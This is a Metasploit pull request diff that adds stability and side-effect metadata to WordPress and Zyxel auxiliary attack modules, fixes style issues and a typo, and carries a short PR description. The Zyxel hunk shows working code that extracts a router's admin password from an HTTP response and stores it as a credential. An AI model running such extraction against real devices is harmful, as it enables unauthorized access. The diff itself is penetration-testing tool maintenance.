+        }
       )
     )
     register_options(

--- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
+++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
@@ -28,7 +28,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=' ],
           [ 'WPVDB', '7542' ]
         ],
-        'DisclosureDate' => '2014-08-07'
+        'DisclosureDate' => '2014-08-07',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
   end

--- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb
+++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb
@@ -30,7 +30,12 @@ class MetasploitModule < Msf::Auxiliary
           ['WPVDB', '7808'],
           ['URL', 'https://rastating.github.io/wp-easycart-privilege-escalation-information-disclosure/']
         ],
-        'DisclosureDate' => '2015-02-25'
+        'DisclosureDate' => '2015-02-25',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/wp_google_maps_sqli.rb
+++ b/modules/auxiliary/admin/http/wp_google_maps_sqli.rb
@@ -25,7 +25,12 @@ class MetasploitModule < Msf::Auxiliary
         ['CVE', '2019-10692'],
         ['WPVDB', '9249']
       ],
-      'DisclosureDate' => '2019-04-02'
+      'DisclosureDate' => '2019-04-02',
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+        'Reliability' => []
+      }
     )
 
     register_options(

--- a/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb
+++ b/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Auxiliary
     fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response, likely not vulnerable') if res.code == 401
     fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response, likely unpredicted URL structure') if res.code == 404
     fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200
-    print_good("Succesfully created token: #{token}")
+    print_good("Successfully created token: #{token}")
     return token, device
   end
 

--- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb
+++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb
@@ -31,7 +31,12 @@ class MetasploitModule < Msf::Auxiliary
         'References' => [
           ['WPVDB', '7785']
         ],
-        'DisclosureDate' => '2015-02-09'
+        'DisclosureDate' => '2015-02-09',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
+++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
@@ -25,7 +25,12 @@ class MetasploitModule < Msf::Auxiliary
         'Daniel Manser', # @antsygeek
         'Sven Vetsch' # @disenchant_ch
       ],
-      'License' => MSF_LICENSE
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => []
+      }
     )
   end
 
@@ -41,33 +46,31 @@ class MetasploitModule < Msf::Auxiliary
       }
     }, 10)
 
-    if (res && res.code == 200)
+    if res && res.code == 200
       print_status('Got response from router.')
     else
       print_error('Unexpected HTTP response code.')
       return
     end
-
-    admin_password = ''
     admin_password_matches = res.body.match(/show_user\(1,"admin","(.+)"/)
 
     if !admin_password_matches
       print_error('Could not obtain admin password')
       return
-    else
-      admin_password = admin_password_matches[1]
-      print_good("Password for user 'admin' is: #{admin_password}")
-
-      connection_details = {
-        module_fullname: fullname,
-        username: 'admin',
-        private_data: admin_password,
-        private_type: :password,
-        status: Metasploit::Model::Login::Status::UNTRIED,
-        proof: res.body
-      }.merge(service_details)
-      create_credential_and_login(connection_details) # makes service_name more consistent
     end
+
+    admin_password = admin_password_matches[1]
+    print_good("Password for user 'admin' is: #{admin_password}")
+
+    connection_details = {
+      module_fullname: fullname,
+      username: 'admin',
+      private_data: admin_password,
+      private_type: :password,
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: res.body
+    }.merge(service_details)
+    create_credential_and_login(connection_details) # makes service_name more consistent
   rescue ::Rex::ConnectionError
     print_error("#{rhost}:#{rport} - Failed to connect")
     return


### PR DESCRIPTION
Most violations resolved with `rubocop -A`, except notes.

Also fixes a bug in `modules/auxiliary/admin/http/typo3_sa_2009_002.rb`:

```diff
-    if (file && ((file.message = 'OK')))
+    if file && file.message == 'OK'
```

Also removes the `LFILE` option from `modules/auxiliary/admin/http/typo3_sa_2009_002.rb`, opting to use `store_loot` instead of the dangerous `open()` method.
